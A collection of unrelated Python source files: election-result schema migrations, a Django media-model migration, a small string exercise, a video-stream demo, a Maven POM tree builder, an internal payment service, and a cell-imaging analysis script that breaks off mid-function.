('list_results', 'election_result', False, True),
('list_results', 'list', False, True),
# ('lists', 'connection', False, True), # see below
('lists', 'election', True, True),
('ballot_results', 'ballot', False, True),
):
update = 'ON UPDATE CASCADE' if update else ''
delete = 'ON DELETE CASCADE' if delete else ''
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref}s (id) {update} {delete}'
)
# there was a typo
context.operations.execute(
'ALTER TABLE candidate_results '
'DROP CONSTRAINT IF EXISTS candiate_results_candiate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candiate_results_candidate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_candiate_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_candidate_id_fkey, '
'ADD CONSTRAINT candidate_results_candidate_id_fkey'
' FOREIGN KEY (candidate_id) REFERENCES candidates (id)'
' ON DELETE CASCADE'
)
context.operations.execute(
'ALTER TABLE candidate_results '
'DROP CONSTRAINT IF EXISTS candiate_results_election_result_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidate_results_election_result_id_fkey,'
' ADD CONSTRAINT candidate_results_election_result_id_fkey'
' FOREIGN KEY (election_result_id) REFERENCES election_results (id)'
' ON DELETE CASCADE'
)
context.operations.execute(
'ALTER TABLE candidates '
'DROP CONSTRAINT IF EXISTS candiates_list_id_fkey, '
'DROP CONSTRAINT IF EXISTS candidates_list_id_fkey,'
' ADD CONSTRAINT candidates_list_id_fkey'
' FOREIGN KEY (list_id) REFERENCES lists (id)'
' ON DELETE CASCADE'
)
# this one does not fit the schema
context.operations.execute(
'ALTER TABLE lists '
'DROP CONSTRAINT IF EXISTS lists_connection_id_fkey,'
' ADD CONSTRAINT lists_connection_id_fkey'
' FOREIGN KEY (connection_id) REFERENCES list_connections (id)'
' ON DELETE CASCADE'
)
@upgrade_task('Adds migration for related link and related link label')
def add_related_link_and_label(context):
# Removed data migrations
pass
@upgrade_task('Adds Doppelter Pukelsheim to CompoundElection/Election')
def add_after_pukelsheim(context):
for table in ('election_compounds', 'elections'):
if not context.has_column(table, 'after_pukelsheim'):
context.add_column_with_defaults(
table, Column(
'after_pukelsheim',
Boolean,
nullable=False,
default=False
), default=lambda x: False)
if not context.has_column('election_compounds', 'pukelsheim_completed'):
context.add_column_with_defaults(
'election_compounds', Column(
'pukelsheim_completed',
Boolean,
nullable=False,
default=False
), default=lambda x: False)
@upgrade_task(
'Add district and none domains of influence',
requires='onegov.ballot:Add region domain of influence',
)
def add_district_and_none_domain(context):
alter_domain_of_influence(
context,
['federation', 'region', 'canton', 'municipality'],
['federation', 'canton', 'region', 'district', 'municipality', 'none']
)
@upgrade_task('Adds last result change columns')
def add_last_result_change(context):
for table in ('elections', 'election_compounds', 'votes'):
if not context.has_column(table, 'last_result_change'):
context.operations.add_column(
table, Column('last_result_change', UTCDateTime)
)
@upgrade_task('Adds voters count to party results')
def add_voters_count(context):
if not context.has_column('party_results', 'voters_count'):
context.operations.add_column(
'party_results', Column('voters_count', Integer)
)
@upgrade_task(
'Cleans up pukelsheim fields',
requires=(
'onegov.ballot:Adds Doppelter Pukelsheim to CompoundElection/Election'
)
)
def cleanup_pukelsheim_fields(context):
if context.has_column('elections', 'after_pukelsheim'):
context.operations.drop_column(
'elections',
'after_pukelsheim'
)
if context.has_column('election_compounds', 'after_pukelsheim'):
context.operations.alter_column(
'election_compounds',
'after_pukelsheim',
new_column_name='pukelsheim'
)
@upgrade_task(
'Add manual completion fields',
requires=(
'onegov.ballot:Cleans up pukelsheim fields'
)
)
def add_manual_completion_fields(context):
if not context.has_column('election_compounds', 'completes_manually'):
context.add_column_with_defaults(
'election_compounds',
Column(
'completes_manually',
Boolean,
nullable=False,
default=False
),
default=lambda x: False
)
if context.has_column('election_compounds', 'pukelsheim_completed'):
context.operations.alter_column(
'election_compounds',
'pukelsheim_completed',
new_column_name='manually_completed'
)
@upgrade_task(
'Change voters count to numeric',
requires=(
'onegov.ballot:Adds voters count to party results'
)
)
def change_voters_count_to_numeric(context):
if context.has_column('party_results', 'voters_count'):
context.operations.alter_column(
'party_results',
'voters_count',
type_=Numeric(12, 2)
)
@upgrade_task('Adds superregion to election results')
def add_superregion_to_election_results(context):
if not context.has_column('election_results', 'superregion'):
context.operations.add_column(
'election_results', Column('superregion', Text, nullable=True)
)
@upgrade_task('Adds total voters count to party results')
def add_total_voters_count(context):
if not context.has_column('party_results', 'total_voters_count'):
context.operations.add_column(
'party_results', Column('total_voters_count', Numeric(12, 2))
)
@upgrade_task(
'Change total voters count to percentage',
requires='onegov.ballot:Adds total voters count to party results',
)
def change_total_voters_count(context):
if (
context.has_column('party_results', 'total_voters_count')
and not context.has_column('party_results', 'voters_count_percentage')
):
context.operations.alter_column(
'party_results', 'total_voters_count',
new_column_name='voters_count_percentage'
)
@upgrade_task('Add party id column')
def add_party_id_column(context):
if not context.has_column('party_results', 'party_id'):
context.operations.add_column(
'party_results',
Column('party_id', Text())
)
@upgrade_task('Add party name translations')
def add_party_name_translations(context):
if context.has_column('party_results', 'name'):
context.operations.alter_column(
'party_results', 'name',
nullable=True
)
if not context.has_column('party_results', 'name_translations'):
context.add_column_with_defaults(
table='party_results',
column=Column('name_translations', HSTORE, nullable=False),
default=lambda x: {}
)
if (
context.has_column('party_results', 'name_translations')
and context.has_column('party_results', 'name')
):
context.operations.execute("""
UPDATE party_results SET name_translations = hstore('de_CH', name);
""")
@upgrade_task(
'Remove obsolete party names',
requires='onegov.ballot:Add party name translations',
)
def remove_obsolete_party_names(context):
if context.has_column('party_results', 'name'):
context.operations.drop_column('party_results', 'name')
if context.has_column('party_results', 'party_id'):
context.operations.execute("""
DELETE FROM party_results WHERE party_id is NULL;
""")
context.operations.alter_column(
'party_results', 'party_id', nullable=False
)
@upgrade_task('Add gender column')
def add_gender_column(context):
if not context.has_column('candidates', 'gender'):
context.operations.add_column(
'candidates',
Column(
'gender',
Enum('male', 'female', 'undetermined',
name='candidate_gender'),
nullable=True
)
)
@upgrade_task('Add year of birth column')
def add_year_of_birth_column(context):
if not context.has_column('candidates', 'year_of_birth'):
context.operations.add_column(
'candidates',
Column('year_of_birth', Integer(), nullable=True)
)
@upgrade_task('Add exapts columns')
def add_expats_columns(context):
for table in ('election_results', 'ballot_results'):
if not context.has_column(table, 'expats'):
context.operations.add_column(
table,
Column('expats', Integer(), nullable=True)
)
@upgrade_task('Add domain columns to party results')
def add_domain_columns_to_party_results(context):
for column in ('domain', 'domain_segment'):
if not context.has_column('party_results', column):
context.operations.add_column(
'party_results',
Column(column, Text(), nullable=True)
)
@upgrade_task(
'Drop party color column',
requires='onegov.ballot:Add party resuts columns',
)
def drop_party_color_column(context):
if context.has_column('party_results', 'color'):
context.operations.drop_column('party_results', 'color')
@upgrade_task(
'Add foreign keys to party results',
requires='onegov.ballot:Add party results to compounds'
)
def add_foreign_keys_to_party_results(context):
if context.has_column('party_results', 'owner'):
context.operations.alter_column(
'party_results', 'owner', nullable=True
)
if not context.has_column('party_results', 'election_id'):
context.operations.add_column(
'party_results',
Column(
'election_id',
Text,
ForeignKey(
'elections.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
if not context.has_column('party_results', 'election_compound_id'):
context.operations.add_column(
'party_results',
Column(
'election_compound_id',
Text,
ForeignKey(
'election_compounds.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
@upgrade_task(
'Add foreign keys to panachage results',
requires='onegov.ballot:Add panachage results to compounds'
)
def add_foreign_keys_to_panachage_results(context):
if not context.has_column('panachage_results', 'election_id'):
context.operations.add_column(
'panachage_results',
Column(
'election_id',
Text,
ForeignKey(
'elections.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
if not context.has_column('panachage_results', 'election_compound_id'):
context.operations.add_column(
'panachage_results',
Column(
'election_compound_id',
Text,
ForeignKey(
'election_compounds.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
@upgrade_task(
'Drop owner from party results',
requires='onegov.ballot:Add foreign keys to party results'
)
def drop_owner_from_party_results(context):
if context.has_column('party_results', 'owner'):
context.operations.drop_column(
'party_results', 'owner'
)
@upgrade_task(
'Drop owner from panachage results',
requires='onegov.ballot:Add foreign keys to panachage results'
)
def drop_owner_from_panachage_results(context):
if context.has_column('panachage_results', 'owner'):
context.operations.drop_column(
'panachage_results', 'owner'
)
@upgrade_task('Add type to election relationships')
def add_type_election_relationships(context):
if context.has_table('election_associations'):
if context.has_table('election_relationships'):
context.operations.drop_table('election_relationships')
context.operations.rename_table(
'election_associations', 'election_relationships'
)
if context.has_table('election_relationships'):
if not context.has_column('election_relationships', 'type'):
context.operations.add_column(
'election_relationships',
Column('type', Text(), nullable=True)
)
@upgrade_task('Remove old panachage results')
def remove_old_panachage_results(context):
if context.has_table('panachage_results'):
context.operations.drop_table('panachage_results')
@upgrade_task('Fix file constraints')
def fix_file_constraints(context):
for table, ref in (
('files_for_elections_files', 'elections'),
('files_for_election_compounds_files', 'election_compounds'),
('files_for_votes_files', 'votes'),
):
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref} (id) ON UPDATE CASCADE'
)
@upgrade_task('Add external ids')
def add_external_ids(context):
for table in ('elections', 'election_compounds', 'votes'):
if not context.has_column(table, 'external_id'):
context.operations.add_column(
table,
Column('external_id', Text(), nullable=True)
)
@upgrade_task('Add external ballot ids')
def add_external_ballot_ids(context):
if not context.has_column('ballots', 'external_id'):
context.operations.add_column(
'ballots',
Column('external_id', Text(), nullable=True)
)
|
# Generated by Django 3.1.5 on 2021-03-26 13:19
from django.db import migrations, models
import django_mysql.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AudioBook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('author', models.CharField(max_length=100)),
('narrator', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Podcast',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('podcastName', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
('hostName', models.CharField(max_length=100)),
('participants', django_mysql.models.ListCharField(models.CharField(max_length=100), default='', max_length=1010, size=10)),
],
),
migrations.CreateModel(
name='Song',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('songName', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
],
),
]
|
tab_cat = "\tI'm tabbed."
pers_cat = "I'm split\non a line"
back_cat = "I'm \\ a \\ cat"
fat_cat = """
I'll do a list:
\t*food
\t* fish
\t* nip\n\t*Grass
"""
print(tab_cat)
print(pers_cat)
print(back_cat)
print(fat_cat)
print("Lyla is a beautiful coder.") |
# -*- coding: utf-8 -*-
# flake8: noqa
"""Automatic and manual clustering facilities."""
from .algorithms import cluster
from .session import Session
from .view_models import (BaseClusterViewModel,
HTMLClusterViewModel,
StatsViewModel,
)
|
import itertools
import os
import cv2
from video_util.frame_drawer import FrameDrawer
get_your_config_from_env_var = os.environ.get('CONFIG_NAME', 'default_value_if_not_set')
# comma separated strings
video_feed_names = os.environ.get('VIDEO_FEED_NAMES',
'FILE1,RTSP2')
streams = os.environ.get('STREAMS',
'/data/datasets/drone/macritchie-reservoir.mp4,rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov')
manual_video_fps = os.environ.get('MANUAL_VIDEO_FPS', '-1,-1') # -1 to try to read from video stream metadata
source_types = os.environ.get('SOURCE_TYPES', 'file,rtsp')
queue_size = int(os.environ.get('QUEUE_SIZE', 2))
recording_dir = os.environ.get('RECORDING_DIR', None)
reconnect_threshold_sec = int(os.environ.get('RECONNECT_THRESHOLD_SEC', 5))
max_height = int(os.environ.get('MAX_HEIGHT', 1080))
method = os.environ.get('METHOD', 'cv2')
'''
Sample code on usage for concurrent streams.
Run from one level above video_utils (video_utils should be treated as a
module; this file just acts as a crash course/demo): `python3 -m video_utils .`
'''
def one_video_manager_to_many_source():
frame_drawer = FrameDrawer()
from .video_manager import VideoManager
vidManager = VideoManager(video_feed_names=video_feed_names.split(','),
streams=streams.split(','), source_types=source_types.split(','),
manual_video_fps=manual_video_fps.split(','), queue_size=queue_size,
recording_dir=recording_dir,
reconnect_threshold_sec=reconnect_threshold_sec, max_height=max_height, method=method)
vidManager.start()
print(f'{vidManager.get_all_videos_information()}')
for frame_count in itertools.count():
frame_of_each_video_feed = vidManager.read() # frames is list of arrays from 0 - 255, dtype uint8
for i, video_stream_information in enumerate(vidManager.videos):
if len(frame_of_each_video_feed[i]) != 0:
drawn_frame = frame_drawer.draw_detections(frame_of_each_video_feed[i],
[('test0', 0, (80, 80, 100, 60)),
('test1', 0, (100, 100, 120, 80))])
cv2.imshow(video_stream_information['video_feed_name'], drawn_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
vidManager.stop()
def one_video_manager_to_one_source():
frame_drawer = FrameDrawer()
from .video_manager_single_feed_multiple_sources import VideoManager
vidManager = VideoManager(source_type='rtsp',
stream='rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov',
manual_video_fps=-1,
rectangle_crops=[(0, 0, 60, 160), (80, 0, 60, 160), (160, 0, 60, 160)],
queue_size=queue_size,
recording_dir=recording_dir,
reconnect_threshold_sec=reconnect_threshold_sec, max_height=max_height, method=method)
vidManager.start()
print(f'{vidManager.get_all_videos_information()}')
for frame_count in itertools.count():
frame_of_each_video_feed = vidManager.read() # frames is list of arrays from 0 - 255, dtype uint8
for i in range(vidManager.num_vid_streams):
if len(frame_of_each_video_feed[i]) != 0:
drawn_frame = frame_drawer.draw_detections(frame_of_each_video_feed[i],
[('test0', 0, (80, 80, 100, 60)),
('test1', 0, (100, 100, 120, 80))])
cv2.imshow(str(i), drawn_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
vidManager.stop()
if __name__ == '__main__':
one_video_manager_to_many_source()
# one_video_manager_to_one_source()
|
from pypomvisualiser.pom.PomTreeNode import PomTreeNode
from pypomvisualiser.exceptions.PyPomExceptions import PomParseError
from enum import Enum
import logging
class NodeEnum(Enum):
EXTDEP = "#C0C0C0"
USERPOM = "#99CCFF"
ROOTPOM = "#0099FF"
class TreeCreation(object):
def __init__(self, listOfPoms):
        '''Build a tree of PomTreeNode objects from a list of parsed POMs.'''
self.rootNode = None
self.nodeList = []
self.resolveTreeStructure(listOfPoms)
def resolveTreeStructure(self, listOfPoms):
for pom in listOfPoms:
print(pom.getFileLocation())
pomArt = pom.getArtifactId()
pomGrp = pom.getGroupId()
''' If node is in found list then use that, if not make a new one'''
tmpnode = self.getNodeWith(pomArt, pomGrp)
            if tmpnode is None:
tmpnode = PomTreeNode(pomArt, pomGrp, NodeEnum.USERPOM, pom)
self.nodeList.append(tmpnode)
            if tmpnode.getData() is None:
tmpnode.setData(pom)
''' ####################'''
'''determines if pom has parent, if it does, determine if in nodeList and add as parentNode'''
if pom.getParentPom():
parPom = pom.getParentPom()
                if (pomArt == parPom.getArtifactId()) and (pomGrp == parPom.getGroupId()):
pass
else:
par = self.inNodeList(self.nodeList, PomTreeNode(parPom.getArtifactId(), parPom.getGroupId(), NodeEnum.USERPOM, None))
tmpnode.setParentNode(par)
par.addChildNodes(tmpnode)
''' determine if any nodes match the dependencies and then add dep nodes accordingly'''
for dep in pom.getDependencies():
notfound = True
for inner in listOfPoms:
if (inner.getGroupId() == dep.getGroupId()) and (inner.getArtifactId() == dep.getArtifactId()):
''' inner is dependency, make node which refers to this.'''
foundNode = self.inNodeList(self.nodeList, PomTreeNode(inner.getArtifactId(), inner.getGroupId(), NodeEnum.USERPOM, None))
tmpnode.addDependencyNode(foundNode)
foundNode.addReverseDependencyNode(tmpnode)
notfound = False
break
# Add reverse dependency assignment
                if notfound:
depNode = self.inNodeList(self.nodeList, PomTreeNode(dep.getArtifactId(), dep.getGroupId(), NodeEnum.EXTDEP, dep))
tmpnode.addDependencyNode(depNode)
depNode.addReverseDependencyNode(tmpnode)
''' ################### '''
self.resolveRootNode()
def getNodeWith(self, artId, grpId):
for temporaryNode in self.nodeList:
if (temporaryNode.getGroupId() == grpId) and (temporaryNode.getArtifactId() == artId):
return temporaryNode
    def inNodeList(self, nodeList, nodeToFind):
        assert type(nodeToFind) is PomTreeNode
        for node in nodeList:
            if (node.getGroupId() == nodeToFind.getGroupId()) and (node.getArtifactId() == nodeToFind.getArtifactId()):
                # already registered: return the existing node without
                # appending a duplicate to the list
                return node
        self.nodeList.append(nodeToFind)
        return nodeToFind
def resolveRootNode(self):
length = len(self.nodeList)
if length > 0:
activeNode = None
for node in self.nodeList:
assert type(node) is PomTreeNode
                if activeNode is not None:
act = self.resolveNodeRelations(node)
if act != activeNode:
logging.error("Multiple root nodes encountered")
raise PomParseError("Resolution of RootNode failed as the structure contains multiple trees")
else:
activeNode = self.resolveNodeRelations(node)
else:
raise PomParseError("Resolution of RootNode failed as the structure is empty")
def resolveNodeRelations(self, potentialRootNode):
parent = potentialRootNode.getParent()
        if parent is not None and parent != potentialRootNode:
print(parent.getArtifactId())
self.resolveNodeRelations(parent)
elif potentialRootNode.getReverseDependencyNodes():
print("rev dep nodes")
''' Needs to follow these, maybe one, maybe all'''
else:
self.rootNode = potentialRootNode
logging.info("Root node chosen: " + potentialRootNode.getArtifactId() + " " + potentialRootNode.getGroupId())
self.rootNode.setType(NodeEnum.ROOTPOM)
''' Could be root node'''
def getRootNode(self):
        return self.rootNode
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service to manage Internal Payments.
There are conditions where the payment will be handled internally. For e.g, zero $ or staff payments.
"""
from datetime import datetime
from typing import Any, Dict
from flask import current_app
from pay_api.services.base_payment_system import PaymentSystemService
from pay_api.services.invoice import Invoice
from pay_api.services.invoice_reference import InvoiceReference
from pay_api.services.payment_account import PaymentAccount
from pay_api.utils.enums import PaymentSystem, PaymentMethod, InvoiceStatus, PaymentStatus
from pay_api.utils.util import generate_transaction_number
from .oauth_service import OAuthService
from .payment_line_item import PaymentLineItem
class InternalPayService(PaymentSystemService, OAuthService):
"""Service to manage internal payment."""
def get_payment_system_code(self):
"""Return INTERNAL as the system code."""
return PaymentSystem.INTERNAL.value
def create_account(self, name: str, contact_info: Dict[str, Any], payment_info: Dict[str, Any],
**kwargs) -> any:
"""No Account needed for internal pay."""
def update_account(self, name: str, cfs_account: any, payment_info: Dict[str, Any]) -> any:
"""No Account needed for direct pay."""
def create_invoice(self, payment_account: PaymentAccount, line_items: [PaymentLineItem], invoice: Invoice,
**kwargs) -> InvoiceReference:
"""Return a static invoice number."""
current_app.logger.debug('<create_invoice')
invoice_reference: InvoiceReference = InvoiceReference.create(invoice.id,
generate_transaction_number(invoice.id), None)
current_app.logger.debug('>create_invoice')
return invoice_reference
def update_invoice(self, payment_account: PaymentAccount, # pylint:disable=too-many-arguments
line_items: [PaymentLineItem], invoice_id: int, paybc_inv_number: str, reference_count: int = 0,
**kwargs):
"""Do nothing as internal payments cannot be updated as it will be completed on creation."""
def cancel_invoice(self, payment_account: PaymentAccount, inv_number: str):
"""Adjust the invoice to zero."""
def get_receipt(self, payment_account: PaymentAccount, pay_response_url: str, invoice_reference: InvoiceReference):
"""Create a static receipt."""
# Find the invoice using the invoice_number
invoice = Invoice.find_by_id(invoice_reference.invoice_id, skip_auth_check=True)
return f'{invoice_reference.invoice_number}', datetime.now(), invoice.total
def get_payment_method_code(self):
"""Return CC as the method code."""
return PaymentMethod.INTERNAL.value
def get_default_invoice_status(self) -> str:
"""Return CREATED as the default invoice status."""
return InvoiceStatus.CREATED.value
def get_default_payment_status(self) -> str:
"""Return the default status for payment when created."""
return PaymentStatus.CREATED.value
def complete_post_invoice(self, invoice: Invoice, invoice_reference: InvoiceReference) -> None:
"""Complete any post invoice activities if needed."""
# pylint: disable=import-outside-toplevel, cyclic-import
from .payment_transaction import PaymentTransaction
from .payment import Payment
# Create a payment record
Payment.create(payment_method=self.get_payment_method_code(),
payment_system=self.get_payment_system_code(),
payment_status=self.get_default_payment_status(),
invoice_number=invoice_reference.invoice_number,
invoice_amount=invoice.total,
payment_account_id=invoice.payment_account_id)
transaction: PaymentTransaction = PaymentTransaction.create_transaction_for_invoice(
invoice.id,
{
'clientSystemUrl': '',
'payReturnUrl': ''
}
)
transaction.update_transaction(transaction.id, pay_response_url=None)
|
#! /usr/bin/env python
"""
Analysis of revision data with more depth in the immune compartment.
"""
import sys
import datetime
from argparse import ArgumentParser, Namespace
import json
from dataclasses import dataclass
from tqdm import tqdm
from joblib import parallel_backend # type: ignore[import]
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
from anndata import AnnData
import scanpy as sc
from imc import Project
from imc.types import Path, DataFrame, Array
from imc.graphics import close_plots, rasterize_scanpy, add_centroids
from imc.utils import z_score
from seaborn_extensions import clustermap, swarmboxenplot
args: Namespace
def main() -> int:
global args
# Parse arguments
args = get_parser().parse_args()
args.resolutions = [float(x) for x in args.resolutions]
prj = get_project()
illustrations(prj)
phenotyping(prj)
replot_with_classic_cell_types(prj)
metacluster_expression(prj)
intra_metacluster(prj)
example_visualizations(prj)
return 0
def get_parser() -> ArgumentParser:
parser = ArgumentParser()
parser.add_argument("--overwrite", action="store_true")
parser.add_argument(
"--resolutions", default=[0.5, 1.0, 1.5, 2.0, 3.0], nargs="+"
)
parser.add_argument("--algos", default=["umap"], nargs="+")
return parser
def get_project() -> Project:
prj = Project(name="imc_revision")
prj.samples = [s for s in prj if "2021" in s.name]
for r in prj.rois:
r.set_channel_exclude(consts.exclude_channels)
return prj
# for s in prj:
# s.rois = [r for r in s if r._get_input_filename("cell_mask").exists()]
@close_plots
def illustrations(prj: Project) -> None:
from csbdeep.utils import normalize # type: ignore[import]
(consts.output_dir / "full_stacks").mkdir()
(consts.output_dir / "illustration").mkdir()
for r in tqdm(prj.rois):
output_f = consts.output_dir / "full_stacks" / r.name + ".pdf"
if output_f.exists():
continue
fig = r.plot_channels()
fig.savefig(output_f, **consts.figkws)
for r in tqdm(prj.rois):
output_f = consts.output_dir / "illustration" / r.name + ".svg"
if output_f.exists():
continue
fig = r.plot_probabilities_and_segmentation()
fig.savefig(output_f, **consts.figkws)
# Specific example
roi_name = "A20_58_20210122_ActivationPanel-01"
x, y = (600, 200), (950, 450)
r = prj.get_rois(roi_name)
q = r._get_channels(
["CD31", "CD39", "DNA1"], minmax=True, log=True, smooth=1
)[1]
q2 = np.moveaxis(q, 0, -1)
fig, ax = plt.subplots(1, 1, figsize=(4, 4))
ax.imshow(normalize(q2))
ax.set(title=roi_name, xlim=x, ylim=y)
fig.savefig(
"Red:CD31-Green:CD39-Blue:DNA.A20_58_example.png", **consts.figkws
)
def qc(prj: Project) -> None:
(consts.output_dir / "qc").mkdir()
output_prefix = consts.output_dir / "qc" / "channel_summary."
c = prj.rois[0].channel_labels
exc = [x for x in c if x in consts.exclude_channels]
prj.channel_summary(output_prefix=output_prefix, channel_exclude=exc)
@close_plots
def phenotyping(prj: Project) -> None:
(consts.output_dir / "phenotyping").mkdir()
# output_prefix = consts.output_dir / "phenotyping" / prj.name + f".{cur_date}."
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_f = output_prefix + "quantification.pq"
if not quant_f.exists() or args.overwrite:
prj.quantify_cells()
quant = prj.quantification
prj.quantification.to_parquet(quant_f)
quant = pd.read_parquet(quant_f)
quant_mean = quant.groupby("sample").mean()
quant = quant.drop(consts.exclude_channels, axis=1)
    # Collapse redundant channels
quant["DNA"] = quant.loc[:, quant.columns.str.contains("DNA")].mean(1)
quant["Ki67"] = quant["Ki67(Pt196)"]
quant = quant.drop(
quant.columns[
quant.columns.str.contains(r"DNA\d\(")
| quant.columns.str.contains(r"Ki67\(")
],
axis=1,
)
# filter out cells
quant_ff = quant_f.replace_(".pq", ".filtered.pq")
if not quant_ff.exists() or args.overwrite:
exclude = filter_out_cells(
quant, plot=True, output_prefix=output_prefix
)
tqdm.write(
f"Filtering out {exclude.sum()} cells ({(exclude.sum() / exclude.shape[0]) * 100:.2f} %)"
)
quant = quant.loc[~exclude, :]
quant.to_parquet(quant_ff)
quant = pd.read_parquet(quant_ff)
# Process, project, cluster
h5ad_f = output_prefix + "sample_zscore.h5ad"
if not h5ad_f.exists() or args.overwrite:
# Drop unwanted channels and redundant morphological features
q = quant.drop(["perimeter", "major_axis_length"], axis=1).reset_index()
id_cols = ["sample", "roi", "obj_id"]
        # get a measure of overall intensity
tech = q.merge(
quant_mean[consts.exclude_channels[:-2]]
.apply(z_score)
.mean(1)
.rename("tech"),
left_on="sample",
right_index=True,
)["tech"]
# # Z-score by sample:
from src.utils import z_score_by_column
zquant = z_score_by_column(
quant, "sample", clip=(-2.5, 10)
).reset_index()
a = AnnData(
zquant.drop(id_cols + ["area"], axis=1),
obs=zquant[id_cols + ["area"]].join(tech),
)
# # keep track of raw untransformed values
q = quant[a.var.index].reset_index()
q = q.reindex(a.obs.index.astype(int)).set_index("obj_id")
r = AnnData(q.reset_index(drop=True))
a.raw = r
sc.pp.scale(a)
# Proceed with dimres + clustering
sc.pp.pca(a)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(a, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(a, gamma=25)
for res in tqdm(args.resolutions, desc="resolution"):
sc.tl.leiden(a, resolution=res, key_added=f"cluster_{res}")
a.obs[f"cluster_{res}"] = pd.Categorical(
a.obs[f"cluster_{res}"].astype(int) + 1
)
sc.write(h5ad_f, a)
a = sc.read(h5ad_f)
a = a[a.obs.sample(frac=1).index, :]
# output_prefix = output_prefix.replace_(cur_date, f"{cur_date}.raw.")
output_prefix += "sample_zscore."
# Plot cluster phenotypes
for res in args.resolutions:
# # get mean per cluster
m = a.to_df().groupby(a.obs[f"cluster_{res}"]).mean()
umap_pos = (
pd.DataFrame(
a.obsm["X_umap"], index=a.obs.index, columns=["UMAP1", "UMAP2"]
)
.groupby(a.obs[f"cluster_{res}"])
.mean()
)
m = m.join(umap_pos)
# mr = (
# AnnData(a.raw.X, var=a.var, obs=a.obs)
# .to_df()
# .groupby(a.obs[f"cluster_{res}"])
# .mean()
# )
# mr = mr.join(umap_pos)
# # get normalized proportions per disease group
annot = a.obs.merge(consts.phenotypes.to_frame().reset_index())
ct = annot["phenotypes"].value_counts()
ct /= ct.sum()
c = annot.groupby([f"cluster_{res}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"cluster_{res}", columns="phenotypes", values=0
)
p = np.log2(p / ct)
for conf in ["abs", "z"]:
# grid = clustermap(
# mr, row_colors=p, config=conf, figsize=(8, 4 * max(1, res))
# )
# grid.fig.savefig(
# output_prefix
# + f"phenotypes.cluster_{res}.clustermap.raw.{conf}.svg",
# **consts.figkws,
# )
grid = clustermap(
m, row_colors=p, config=conf, figsize=(8, 4 * max(1, res))
)
grid.fig.savefig(
output_prefix
+ f"phenotypes.cluster_{res}.clustermap.norm.{conf}.svg",
**consts.figkws,
)
# Plot projections
# vmin = [min(x, 0.0) for x in np.percentile(a.raw.X, 1, axis=0).tolist()]
# vmax = [max(x, 1.0) for x in np.percentile(a.raw.X, 99, axis=0).tolist()]
# vmin = np.percentile(a.raw.X, 1, axis=0).tolist()
vmin = None
vmax = np.percentile(a.raw.X, 99, axis=0).tolist()
# notes:
## if scaling values clip both ends to percentiles
## if using log or raw original values clip top to percentiles
color = (
a.var.index.tolist()
+ ["area", "sample"]
+ [f"cluster_{res}" for res in args.resolutions]
)
for algo in args.algos:
# norm values
f = output_prefix + f"{algo}.z.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a,
color=color,
show=False,
use_raw=False,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# original values
f = output_prefix + f"{algo}.raw.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a,
color=color,
show=False,
vmin=vmin,
vmax=vmax
+ [np.percentile(a.obs["area"], 99)]
+ [None]
+ [None] * (len(args.resolutions)),
use_raw=True,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
def replot_with_classic_cell_types(prj) -> None:
(consts.output_dir / "phenotyping").mkdir()
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
res = 2.0
h5ad_f = output_prefix + "sample_zscore.labeled.h5ad"
a = sc.read(h5ad_f)
a = a[a.obs.sample(frac=1).index, :]
# Redo UMAP with only filtered cell types
